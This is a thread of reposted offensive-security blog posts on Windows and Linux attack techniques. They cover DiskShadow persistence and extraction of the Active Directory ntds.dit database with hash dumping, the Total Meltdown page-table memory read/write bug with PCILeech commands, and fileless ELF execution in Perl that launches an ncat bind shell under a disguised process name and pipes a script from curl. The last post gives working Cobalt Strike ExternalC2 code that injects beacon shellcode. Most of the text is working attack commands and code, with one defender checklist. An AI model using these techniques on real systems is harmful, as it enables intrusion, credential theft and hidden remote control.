carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail. First, let’s modify our script (diskshadow.txt) to demonstrate this basic technique: EXEC "cmd.exe" /c c:\test\evil.exe *In order to support command switches, we must quote the initial binary with EXEC. This also works under Interactive Mode. Second, let’s add persistence with the following commands: - Run Key Value - reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt" - User Level Scheduled Task - schtasks /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt" Let’s take a further look at these… AutoRuns – Run Key Value After creating the key value, we can see that our key is hidden when we open up AutoRuns and select the Logon tab. By default, Windows signed executables are hidden from view (with a few notable exceptions) as demonstrated in this screenshot: After de-selecting “Hide Windows Entries”, we can see the AutoRuns entry: AutoRuns – Scheduled Tasks Like the Run Key method, we can see that our entry is hidden in the default AutoRuns view: After de-selecting “Hide Windows Entries”, we can see AutoRuns entry: Extracting the Active Directory Database Since we are discussing the usage of a shadow copy tool, let’s move forward to showcase (yet another) VSS method for extracting the Active Directory (AD) database – ntds.dit. In the following walk-through, we will assume successful compromise of an Active Directory Domain Controller (Win2k12) and are running DiskShadow under a privileged context in Script Mode. First, let’s prepare our script. We have performed some initial recon to determine our target drive letter (for the logical drive that ‘contains’ the AD database) to shadow as well as discovered a logical drive letter that is not in use on the system. Here is the DiskShadow script (diskshadow.txt): set context persistent nowriters add volume c: alias someAlias create expose %someAlias% z: exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit delete shadows volume %someAlias% reset [Helpful Source: DataCore] In this script, we create a persistent shadow copy so that we can perform copy operations to capture the sensitive target file. By mounting a (unique) logical drive, we can guarantee a copy path for our target file, which we will extract to the ‘exfil’ directory before deleting our shadow copy identified by someAlias. *Note: We can attempt to copy out the target file by specifying a shadow device name /unique identifier. This is slightly stealthier, but it is important to ensure that labels/UUIDs are correct (via initial recon) or else the script will fail to run. This use case may be more suitable for Interactive Mode. The commands and results of the DiskShadow operation are presented in this screenshot: type c:\diskshadow.txt diskshadow.exe /s c:\diskshadow.txt dir c:\exfil In addition to the AD database, we will also need to extract the SYSTEM registry hive: reg.exe save hklm\system c:\exfil\system.bak After transferring these files from the target machine, we use SecretsDump.py to extract the NTLM Hashes: secretsdump.py -ntds ntds.dit -system system.bak LOCAL Success! We have used another method to extract the AD database and hashes. Now, let’s compare and contrast DiskShadow and Vshadow… DiskShadow vs. Vshadow DiskShadow.exe and VShadow.exe have very similar capabilities. However, there are a few differences between these applications that may justify which one is the better choice for the intended operational use case. Let’s explore some of these in greater detail: Operating System Inclusion DiskShadow.exe is included with the Windows Server operating system since 2008. Vshadow.exe is included with the Windows SDK. Unless the target machine has the Windows SDK installed, Vshadow.exe must be uploaded to the target machine. In a “living off the land” scenario, DiskShadow.exe has the clear advantage. Utility & Usage Under the context of a normal user in our test case, we can use several DiskShadow features without privilege (UAC) implications. In my previous testing, Vshadow had privilege constraints (e.g. external command execution could only be invoked after running a VSS operation). Additionally, DiskShadow is flexible with command switch support as previously described. DiskShadow.exe has the advantage here. Command Line Orientation Vshadow is “command line friendly” while DiskShadow requires use by interactive prompt or script file. Unless you have (remote) “TTY” access to a target machine, DiskShadow’s interactive prompt may not be suitable (e.g. for some backdoor shells). Additionally, there is an increased risk for detection when creating files or uploading files to a target machine. In the strict confines of this scenario, Vshadow has the advantage (although, creating a text file will likely have less impact than uploading a binary – refer to the previous section). AutoRuns Persistence & Evasion In the previous Vshadow blog post, you may recall that Vshadow is signed with the Microsoft signing certificate. This has AutoRuns implications such that it will appear within the Default View since Microsoft signed binaries are not hidden. Since DiskShadow is signed with the Windows certificate, it is hidden from the default view. In this scenario, DiskShadow has the advantage. Active Directory Database Extraction If script mode is the only option for DiskShadow usage, extracting the AD database may require additional operations if assumed defaults are not valid (e.g. Shadow Volume disk name is not what we expected). Aside from crafting and running the script, a logical drive may have to be mapped on the target machine to copy out ntds.dit. This does add an additional level of noise to the shadow copy operation. Vshadow has the advantage here. Conclusion All things considered, DiskShadow seems to be more compelling for operational use. However, that does not discount Vshadow (and other VSS methods for that matter) as a prospective tool used by threat agents. Vshadow has been used maliciously in the past for other reasons. For DiskShadow, Blue Teams and Network Defenders should consider the following: Monitor the Volume Shadow Service (VSS) for random shadow creations/deletions and any activity that involves the AD database file (ntds.dit). Monitor for suspicious instances of System Event ID 7036 (“The Volume Shadow Copy service entered the running state”) and invocation of the VSSVC.exe process. Monitor process creation events for diskshadow.exe and spawned child processes. Monitor for process integrity. If diskshadow.exe runs at a medium integrity, that is likely a red flag. Monitor for instances of diskshadow.exe on client endpoints. Unless there is a business need, diskshadow.exe *should* not be present on client Windows operating systems. Monitor for new and interesting logical drive mappings. Inspect suspicious “AutoRuns” entries. Scrutinize signed binaries and inspect script files. Enforce Application Whitelisting. Strict policies may prevent DiskShadow pass-thru applications from executing. Fight the good fight, and train your users. If they see something (e.g. a weird pop up window), they should say something! As always, if you have questions or comments, feel free to reach out to me here or on Twitter. Thank you for taking the time to read about DiskShadow! Sursa: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
  10. Total Meltdown? Did you think Meltdown was bad? Unprivileged applications being able to read kernel memory at speeds possibly as high as megabytes per second was not a good thing. Meet the Windows 7 Meltdown patch from January. It stopped Meltdown but opened up a vulnerability way worse ... It allowed any process to read the complete memory contents at gigabytes per second, oh - it was possible to write to arbitrary memory as well. No fancy exploits were needed. Windows 7 already did the hard work of mapping in the required memory into every running process. Exploitation was just a matter of read and write to already mapped in-process virtual memory. No fancy APIs or syscalls required - just standard read and write! Accessing memory at over 4GB/s, dumping to disk is slower due to disk transfer speeds. How is this possible? In short - the User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself. The PML4 is the base of the 4-level in-memory page table hierarchy that the CPU Memory Management Unit (MMU) uses to translate the virtual addresses of a process into physical memory addresses in RAM. For more in-depth information about paging please have a look at Getting Physical: Extreme abuse of Intel based Paging Systems - Part 1 and Part 2. PML4 self-referencing entry at offset 0xF68 with value 0x0000000062100867. Windows have a special entry in this topmost PML4 page table that references itself, a self-referencing entry. In Windows 7 the PML4 self-referencing is fixed at the position 0x1ED, offset 0xF68 (it is randomized in Windows 10). This means that the PML4 will always be mapped at the address: 0xFFFFF6FB7DBED000 in virtual memory. This is normally a memory address only made available to the kernel (Supervisor). Since the permission bit was erroneously set to User this meant the PML4 was mapped into every process and made available to code executing in user-mode. "kernel address" memory addresses mapped in every process as user-mode read/write pages. Once read/write access has been gained to the page tables it will be trivially easy to gain access to the complete physical memory, unless it is additionally protected by Extended Page Tables (EPTs) used for Virtualization. All one has to do is to write their own Page Table Entries (PTEs) into the page tables to access arbitrary physical memory. The last '7' in the PML4e 0x0000000062100867 (from above example) indicates that bits 0, 1, 2 are set, which means it's Present, Writable and User-mode accessible as per the description in the Intel Manual. Excerpt from the Intel Manual, if bit 2 is set to '1' user-mode access are permitted. Can I try this out myself? Yes absolutely. The technique has been added as a memory acquisition device to the PCILeech direct memory access attack toolkit. Just download PCILeech and execute it with device type: -device totalmeltdown on a vulnerable Windows 7 system. Dump memory to file with the command: pcileech.exe dump -out memorydump.raw -device totalmeltdown -v -force . If you have the Dokany file system driver installed you should be able to mount the running processes as files and folders in the Memory Process File System - with the virtual memory of the kernel and the processes as read/write. To mount the processes issue the command: pcileech.exe mount -device totalmeltdown . Please remember to re-install your security updates if you temporarily uninstall the latest one in order to test this vulnerability. A vulnerable system is "exploited" and the running processes are mounted with PCILeech. Process memory maps and PML4 are accessed. Is my system vulnerable? Only Windows 7 x64 systems patched with the 2018-01 or 2018-02 patches are vulnerable. If your system isn't patched since December 2017 or if it's patched with the 2018-03 2018-03-29 patches or later it will be secure. Other Windows versions - such as Windows 10 or 8.1 are completely secure with regards to this issue and have never been affected by it. Other I discovered this vulnerability just after it had been patched in the 2018-03 Patch Tuesday. I have not been able to correlate the vulnerability to known CVEs or other known issues. Updates Windows 2008R2 was vulnerable as well. OOB security update released to fully resolve the vulnerability on 2018-03-29. CVE-2018-1038. Apply immediately if affected! Timeline 2018-03-xx--25: Issue identified in Windows 7 x64. Issue seemed to be patched already. PoC coded. Contacted MSRC with technical description asking if OK to publish a blog entry or if I should hold off publication. 2018-03-26: Green light given by MSRC for me to publish blog entry. 2018-03-27: Published blog entry and PoC. 2018-03-28: Found out that the March patches only partially resolved the vulnerability. Contacted MSRC again. 2018-03-29: OOB security update released by Microsoft. CVE-2018-1038. Apply immediately if affected! Huge Thank You to everyone at Microsoft that worked hard to resolve this issue. It is super impressive to be able to be able to roll out a complex kernel update in little over a day. It was never my intention to release a fairly potent kernel 0-day publicly. I hope the above timeline explains how this could happen. Sursa: https://blog.frizk.net/2018/03/total-meltdown.html?m=1
  11. In-Memory-Only ELF Execution (Without tmpfs) 10 minute read CONTENTS INTRODUCTION CAVEATS ON TARGET MEMFD_CREATE(2) WRITE(2) OPTIONAL: FORK(2) EXECVE(2) SCRIPTING IT ARTIFACTS DEMO TL;DR In which we run a normal ELF binary on Linux without touching the filesystem (except /proc). Introduction Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process? Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary. The manpage has the following to say on the subject of naming anonymous files: The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects. In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name. Listing /proc/<PID>/fd, anonymous files look like this: stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd total 0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted) lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted) Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird but c’est la vie. Caveats Unless we land on target with some way to call memfd_create(2), from our initial vector (e.g. injection into a Perl or Python program with eval()), we’ll need a way to execute system calls on target. We could drop a binary to do this, but then we’ve failed to acheive fileless ELF execution. Fortunately, Perl’s syscall() solves this problem for us nicely. We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative. As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn’t seem to work. The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with uname -r. stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r 4.4.0-116-generic On Target Aside execve(2)ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn’t much difference from starting any other program. Let’s have a look at the system calls we’ll use. memfd_create(2) Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we’ll use the memfd_create(2) system call to make our anonymous file. We’ll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary. Because we’re using Perl’s syscall() to call the memfd_create(2), we don’t have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we’ll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MEMFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_. stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' * asm-generic/unistd.h:#define __NR_memfd_create 279 asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create) linux/memfd.h:#define MFD_CLOEXEC 0x0001U x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319 x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356 x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319) x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is a consatnt 0x0001U (i.e. 1, in linux/memfd.h). Now that we’ve got the numbers we need, we’re almost ready to do the Perl equivalent of C’s fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)). The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we’ll pass an empty string to memfd_create(2) via syscall(). Perl’s syscall() won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead. Putting it together, let’s finally make our anonymous file: my $name = ""; my $fd = syscall(319, $name, 1); if (-1 == $fd) { die "memfd_create: $!"; } We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file: stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`' total 0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0 lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted) write(2) Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it. Perl’s open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle: open(my $FH, '>&='.$fd) or die "open: $!"; select((select($FH), $|=1)[0]); We now have a file handle which refers to our anonymous file. Next we need to make our binary available to Perl, so we can write it to the anonymous file. We’ll turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the anonymous file. perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./elfbinary This will give us many, many lines similar to: print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/ or die qq/write: $!/; print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/ or die qq/write: $!/; print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/ or die qq/write: $!/; Exceuting those puts our ELF binary into memory. Time to run it. Optional: fork(2) Ok, fork(2) is isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s fork() is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using fork() to spawn multiple children looks something like: while ($keep_going) { my $pid = fork(); if (-1 == $pid) { # Error die "fork: $!"; } if (0 == $pid) { # Child # Do child things here exit 0; } } Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate: # Spawn child my $pid = fork(); if (-1 == $pid) { # Error die "fork1: $!"; } if (0 != $pid) { # Parent terminates exit 0; } # In the child, become session leader if (-1 == syscall(112)) { die "setsid: $!"; } # Spawn grandchild $pid = fork(); if (-1 == $pid) { # Error die "fork2: $!"; } if (0 != $pid) { # Child terminates exit 0; } # In the grandchild here, do grandchild things We can now have our ELF process run multiple times or in a separate process. Let’s do it. execve(2) Linux process creation is a funny thing. Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albiet with easier syntax. We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else. The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor. exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!"; The new process won’t have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the/proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process. We’ve now got an ELF binary running without putting anything on disk or even in the filesystem. Scripting it It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand. Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list: cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"' This will run Perl, renamed in the process list to /sbin/iscsid with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to perl stdin via our local SSH client. The end result is our script is run without touching disk at all. Without creds but with access to the target (i.e. after exploiting on), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there. Artifacts Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink. If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2). Other than that, there’s very little evidence anything is wrong. Demo To see this in action, have a look at this asciicast. TL;DR In C (translate to your non-disk-touching language of choice): fd = memfd_create("", MFD_CLOEXEC); write(pid, elfbuffer, elfbuffer_len); asprintf(p, "/proc/self/fd/%i", fd); execl(p, "kittens", "arg1", "arg2", NULL); Updated: March 31, 2018 Sursa: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
  12. Exploring Cobalt Strike's ExternalC2 framework Posted on 30th March 2018 As many testers will know, achieving C2 communication can sometimes be a pain. Whether because of egress firewall rules or process restrictions, the simple days of reverse shells and reverse HTTP C2 channels are quickly coming to an end. OK, maybe I exaggerated that a bit, but it's certainly becoming harder. So, I wanted to look at some alternate routes to achieve C2 communication and with this, I came across Cobalt Strike’s ExternalC2 framework. ExternalC2 ExternalC2 is a specification/framework introduced by Cobalt Strike, which allows hackers to extend the default HTTP(S)/DNS/SMB C2 communication channels offered. The full specification can be downloaded here. Essentially this works by allowing the user to develop a number of components: Third-Party Controller - Responsible for creating a connection to the Cobalt Strike TeamServer, and communicating with a Third-Party Client on the target host using a custom C2 channel. Third-Party Client - Responsible for communicating with the Third-Party Controller using a custom C2 channel, and relaying commands to the SMB Beacon. SMB Beacon - The standard beacon which will be executed on the victim host. Using the diagram from CS's documentation, we can see just how this all fits together: Here we can see that our custom C2 channel is transmitted between the Third-Party Controller and the Third-Party Client, both of which we can develop and control. Now, before we roll up our sleeves, we need to understand how to communicate with the Team Server ExternalC2 interface. First, we need to tell Cobalt Strike to start ExternalC2. This is done with an aggressor script calling the externalc2_start function, and passing a port. Once the ExternalC2 service is up and running, we need to communicate using a custom protocol. The protocol is actually pretty straight forward, consisting of a 4 byte little-endian length field, and a blob of data, for example: To begin communication, our Third-Party Controller opens a connection to TeamServer and sends a number of options: arch - The architecture of the beacon to be used (x86 or x64). pipename - The name of the pipe used to communicate with the beacon. block - Time in milliseconds that TeamServer will block between tasks. Once each option has been sent, the Third-Party Controller sends a go command. This starts the ExternalC2 communication, and causes a beacon to be generated and sent. The Third-Party Controller then relays this SMB beacon payload to the Third-Party Client, which then needs to spawn the SMB beacon. Once the SMB beacon has been spawned on the victim host, we need to establish a connection to enable passing of commands. This is done over a named pipe, and the protocol used between the Third-Party Client and the SMB Beacon is exactly the same as between the Third-Party Client and Third-Party Controller... a 4 byte little-endian length field, and trailing data. OK, enough theory, let’s create a “Hello World” example to simply relay the communication over a network. Hello World ExternalC2 Example For this example, we will be using Python on the server side for our Third-Party Controller, and C for our client side Third-Party Client. First, we need our aggressor script to tell Cobalt Strike to enable ExternalC2: # start the External C2 server and bind to 0.0.0.0:2222 externalc2_start("0.0.0.0", 2222); This opens up ExternalC2 on 0.0.0.0:2222. Now that ExternalC2 is up and running, we can create our Third-Party Controller. Let’s first establish our connection to the TeamServer ExternalC2 interface: _socketTS = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) _socketTS.connect(("127.0.0.1", 2222)) Once established, we need to send over our options. We will create a few quick helper function to allow us to prefix our 4 byte length without manually crafting it each time: def encodeFrame(data): return struct.pack("<I", len(data)) + data def sendToTS(data): _socketTS.sendall(encodeFrame(data)) Now we can use these helper functions to send over our options: # Send out config options sendToTS("arch=x86") sendToTS(“pipename=xpntest") sendToTS("block=500") sendToTS("go") Now that Cobalt Strike knows we want an x86 SMB Beacon, we need to receive data. Again let’s create a few helper functions to handle the decoding of packets rather than manually decoding each time: def decodeFrame(data): len = struct.unpack("<I", data[0:3]) body = data[4:] return (len, body) def recvFromTS(): data = "" _len = _socketTS.recv(4) l = struct.unpack("<I",_len)[0] while len(data) < l: data += _socketTS.recv(l - len(data)) return data This allows us to receive raw data with: data = recvFromTS() Next, we need to allow our Third-Party Client to connect to us using a C2 protocol of our choice. For now, we are simply going to use the same 4 byte length packet format for our C2 channel protocol. So first, we need a socket for the Third-Party Client to connect to: _socketBeacon = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) _socketBeacon.bind(("0.0.0.0", 8081)) _socketBeacon.listen(1) _socketClient = _socketBeacon.accept()[0] Then, once a connection is received, we enter our recv/send loop where we receive data from the victim host, forward this onto Cobalt Strike, and receive data from Cobalt Strike, forwarding this to our victim host: while(True): print "Sending %d bytes to beacon" % len(data) sendToBeacon(data) data = recvFromBeacon() print "Received %d bytes from beacon" % len(data) print "Sending %d bytes to TS" % len(data) sendToTS(data) data = recvFromTS() print "Received %d bytes from TS" % len(data) Our finished example can be found here. Now we have a working controller, we need to create our Third-Party Client. To make things a bit easier, we will use win32 and C for this, giving us access to Windows native API. Let’s start with a few helper functions. First, we need to connect to the Third-Party Controller. Here we will simply use WinSock2 to establish a TCP connection to the controller: // Creates a new C2 controller connection for relaying commands SOCKET createC2Socket(const char *addr, WORD port) { WSADATA wsd; SOCKET sd; SOCKADDR_IN sin; WSAStartup(0x0202, &wsd); memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr.S_un.S_addr = inet_addr(addr); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); connect(sd, (SOCKADDR*)&sin, sizeof(sin)); return sd; } Next, we need a way to receive data. This is similar to what we saw in our Python code, with our length prefix being used as an indicator as to how many data bytes we are receiving: // Receives data from our C2 controller to be relayed to the injected beacon char *recvData(SOCKET sd, DWORD *len) { char *buffer; DWORD bytesReceived = 0, totalLen = 0; *len = 0; recv(sd, (char *)len, 4, 0); buffer = (char *)malloc(*len); if (buffer == NULL) return NULL; while (totalLen < *len) { bytesReceived = recv(sd, buffer + totalLen, *len - totalLen, 0); totalLen += bytesReceived; } return buffer; } Similar, we need a way to return data over our C2 channel to the Controller: // Sends data to our C2 controller received from our injected beacon void sendData(SOCKET sd, const char *data, DWORD len) { char *buffer = (char *)malloc(len + 4); if (buffer == NULL): return; DWORD bytesWritten = 0, totalLen = 0; *(DWORD *)buffer = len; memcpy(buffer + 4, data, len); while (totalLen < len + 4) { bytesWritten = send(sd, buffer + totalLen, len + 4 - totalLen, 0); totalLen += bytesWritten; } free(buffer); } Now we have the ability to communicate with our Controller, the first thing we want to do is to receive the beacon payload. This will be a raw x86 or x64 payload (depending on the options passed by the Third-Party Controller to Cobalt Strike), and is expected to be copied into memory before being executed. For example, let’s grab the beacon payload: // Create a connection back to our C2 controller SOCKET c2socket = createC2Socket("192.168.1.65", 8081); payloadData = recvData(c2socket, &payloadLen); And then for the purposes of this demo, we will use the Win32 VirtualAlloc function to allocate an executable range of memory, and CreateThread to execute the code: HANDLE threadHandle; DWORD threadId = 0; char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (alloc == NULL) return; memcpy(alloc, payload, len); threadHandle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, &threadId); Once the SMB Beacon is up and running, we need to connect to its named pipe. To do this, we will just repeatedly attempt to connect to our \\.\pipe\xpntest pipe (remember, this pipename was passed as an option earlier on, and will be used by the SMB Beacon to receive commands): // Loop until the pipe is up and ready to use while (beaconPipe == INVALID_HANDLE_VALUE) { // Create our IPC pipe for talking to the C2 beacon Sleep(500); beaconPipe = connectBeaconPipe("\\\\.\\pipe\\xpntest"); } And then, once we have a connection, we can continue with our send/recv loop: while (true) { // Start the pipe dance payloadData = recvFromBeacon(beaconPipe, &payloadLen); if (payloadLen == 0) break; sendData(c2socket, payloadData, payloadLen); free(payloadData); payloadData = recvData(c2socket, &payloadLen); if (payloadLen == 0) break; sendToBeacon(beaconPipe, payloadData, payloadLen); free(payloadData); } And that’s it, we have the basics of our ExternalC2 service set up. The full code for the Third-Party Client can be found here. Now, onto something a bit more interesting. Transfer C2 over file Let’s recap on what it is we control when attempting to create a custom C2 protocol: From here, we can see that the data transfer between the Third-Party Controller and Third-Party Client is where we get to have some fun. Taking our previous "Hello World" example, let’s attempt to port this into something a bit more interesting, transferring data over a file read/write. Why would we want to do this? Well, let’s say we are in a Windows domain environment and compromise a machine with very limited outbound access. One thing that is permitted however is access to a file share... see where I’m going with this By writing C2 data from a machine with access to our C2 server into a file on the share, and reading the data from the firewall’d machine, we have a way to run our Cobalt Strike beacon. Let’s think about just how this will look: Here we have actually introduced an additional element, which essentially tunnels data into and out of the file, and communicates with the Third Party Controller. Again, for the purposes of this example, our communication between the Third-Party Controller and the "Internet Connected Host" will use the familiar 4 byte length prefix protocol, so there is no reason to modify our existing Python Third-Party Controller. What we will do however, is split our previous Third-Party Client into 2 parts. One which is responsible for running on the "Internet Connected Host", receiving data from the Third-Party Controller and writing this into a file. The second, which runs from the "Restricted Host", reads data from the file, spawns the SMB Beacon, and passes data to this beacon. I won't go over the elements we covered above, but I'll show one way the file transfer can be achieved. First, we need to create the file we will be communicating over. For this we will just use CreateFileA, however we must ensure that the FILE_SHARE_READ and FILE_SHARE_WRITEoptions are provided. This will allow both sides of the Third-Party Client to read and write to the file simultaneously: HANDLE openC2FileServer(const char *filepath) { HANDLE handle; handle = CreateFileA(filepath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (handle == INVALID_HANDLE_VALUE) printf("Error opening file: %x\n", GetLastError()); return handle; } Next, we need a way to serialising our C2 data into the file, as well as indicating which of the 2 clients should be processing data at any time. To do this, a simple header can be used, for example: struct file_c2_header { DWORD id; DWORD len; }; The idea is that we simply poll on the id field, which acts as a signal to each Third-Party Client of who should be reading and who writing data. Putting together our file read and write helpers, we have something that looks like this: void writeC2File(HANDLE c2File, const char *data, DWORD len, int id) { char *fileBytes = NULL; DWORD bytesWritten = 0; fileBytes = (char *)malloc(8 + len); if (fileBytes == NULL) return; // Add our file header *(DWORD *)fileBytes = id; *(DWORD *)(fileBytes+4) = len; memcpy(fileBytes + 8, data, len); // Make sure we are at the beginning of the file SetFilePointer(c2File, 0, 0, FILE_BEGIN); // Write our C2 data in WriteFile(c2File, fileBytes, 8 + len, &bytesWritten, NULL); printf("[*] Wrote %d bytes\n", bytesWritten); } char *readC2File(HANDLE c2File, DWORD *len, int expect) { char header[8]; DWORD bytesRead = 0; char *fileBytes = NULL; memset(header, 0xFF, sizeof(header)); // Poll until we have our expected id in the header while (*(DWORD *)header != expect) { SetFilePointer(c2File, 0, 0, FILE_BEGIN); ReadFile(c2File, header, 8, &bytesRead, NULL); Sleep(100); } // Read out the expected length from the header *len = *(DWORD *)(header + 4); fileBytes = (char *)malloc(*len); if (fileBytes == NULL) return NULL; // Finally, read out our C2 data ReadFile(c2File, fileBytes, *len, &bytesRead, NULL); printf("[*] Read %d bytes\n", bytesRead); return fileBytes; } Here we see that we are adding our header to the file, and read/writing C2 data into the file respectively. And that is pretty much all there is to it. All that is left to do is implement our recv/write/read/send loop and we have C2 operating across a file transfer. The full code for the above Third-Party Controller can be found here. Let's see this in action: If you are interested in learning more about ExternalC2, there are a number of useful resources which can be found over at the Cobalt 